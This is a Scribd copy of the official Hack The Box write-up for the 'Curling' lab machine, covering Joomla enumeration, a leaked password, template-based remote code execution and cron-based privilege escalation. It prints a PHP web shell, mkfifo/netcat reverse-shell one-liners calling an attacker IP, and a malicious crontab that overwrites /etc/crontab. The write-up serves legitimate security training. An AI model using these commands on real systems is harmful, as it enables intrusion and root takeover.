Scribd
Upload
18 views

160-Curling_HTB_Official_writeup_Tamarisk

The document outlines the process for exploiting an Easy difficulty Linux box named Curling, which involves enumeration to discover a password in a web root file and gaining access through a Joomla CMS. It details steps for remote code execution via a modified PHP template, retrieving a user shell by reversing a hex dump, and escalating privileges through a cron job exploit. The document provides specific commands and methods used throughout the process, including the use of tools like Nmap and pspy.

Uploaded by

hakernet92
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
18 views

160-Curling_HTB_Official_writeup_Tamarisk

The document outlines the process for exploiting an Easy difficulty Linux box named Curling, which involves enumeration to discover a password in a web root file and gaining access through a Joomla CMS. It details steps for remote code execution via a modified PHP template, retrieving a user shell by reversing a hex dump, and escalating privileges through a cron job exploit. The document provides specific commands and methods used throughout the process, including the use of tools like Nmap and pspy.

Uploaded by

hakernet92
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Curling

08​th​ May 2019 / Document No D19.100.19


Prepared By: MinatoTW
Machine Author: l4mpje
Difficulty: ​Easy
Classification: Official

Page 1 / 10
SYNOPSIS
Curling is an Easy difficulty Linux box which requires a fair amount of enumeration. The password
is saved in a file on the web root. The username can be download through a post on the CMS
which allows a login. Modifying the php template gives a shell. Finding a hex dump and reversing
it gives a user shell. On enumerating running processes a cron is discovered which can be
exploited for root.

Skills Required Skills Learned

● Enumeration ● Analyzing hex dump


● Curl usage

Page 2 / 10
ENUMERATION

NMAP
ports=$(nmap -p- --min-rate=​1000​ -T4 ​10.10.10.150​ | grep ^[​0-9​] | cut -d
'/'​ -f ​1​ | tr ​'\n'​ ​','​ | sed s/,$//)
nmap -sC -sV -p$ports ​10.10.10.150​ --open

Apache is running on port 80 and SSH on port 22.

APACHE

Navigating to port 80 we come across a Joomla website.

Page 3 / 10
The page contains two usernames “Super user” and Floris.

Checking the HTML source of the page reveals a comment saying secret.txt .

Checking ​http://10.10.10.150/secret.txt​ we find a string which is base64 encoded. Decoding it


gives the string “Curling2018!”.

curl -s http://10.10.10.150/secret.txt | base64 -d

Going to the admin page at http://10.10.10.150/administrator/ and trying to login with the
username Floris and password Curling2018! logs us in.

Page 4 / 10
FOOTHOLD

Logging in gives us access to the control panel.

On the right side under Configuration click on Templates > Templates > Protostar.

Now click on a php file like index.php and add command execution.

system($_REQUEST[​'pwn'​]);

Page 5 / 10
Click on save and navigate to /index.php to issue commands.

Now that we have RCE we can get a reverse shell.

curl http://10.10.10.150/index.php -G --data-urlencode ​'pwn=rm


/tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f
'

Get a TTY shell by running,


python3 -c ​"import pty;pty.spawn('/bin/bash')"

Page 6 / 10
LATERAL MOVEMENT

HEX DUMP

Navigating /home/floris we find a file named password_backup.

The file looks like a hex dump done using xxd which can be reversed.

cd​ /tmp
cp /home/floris/password_backup .
cat password_backup | xxd -r > bak
file bak

Page 7 / 10
The resulting file is bzip2 compressed.
The file appears to be repeatedly archived. The steps to decompress it are,

bzip2 -d bak
file bak.out
mv bak.out bak.gz
gzip -d bak.gz
file bak
bzip2 -d bak
file bak.out
tar xf bak.out
cat password.txt

The file found was password.txt which is the password for floris. We can now SSH in as floris with
the discovered password.

Page 8 / 10
PRIVILEGE ESCALATION

ENUMERATION

We enumerate the running crons using ​pspy​. Download the smaller binary and transfer it the box.

wget
https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy64s

scp pspy64s [email protected]:/tmp


cd​ /tmp
chmod +x pspy64s
./pspy64s

After letting it run for a minute we’ll find a cron running,

According to curl ​manpage​, the -K option is used to specify a config file. The cron uses input as
the config and outputs to report.

The input file is owned by our group, so we can write our own config. From the manpage we
know that the “output” parameter can be used to specify the output file. We can create a
malicious crontab and overwrite it on the box.`

Page 9 / 10
MANIPULATING THE CONFIG

First create a malicious crontab locally and start a simple http server.

cp /etc/crontab .
echo​ ​'* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i
2>&1|nc 10.10.14.2 1234 >/tmp/f '​ >> crontab
python3 -m http.server 80

Now edit the input config with the contents.

url = ​"http://10.10.14.2/crontab"
output = ​"/etc/crontab"

A shell should be received within a minute.

Page 10 / 10

You might also like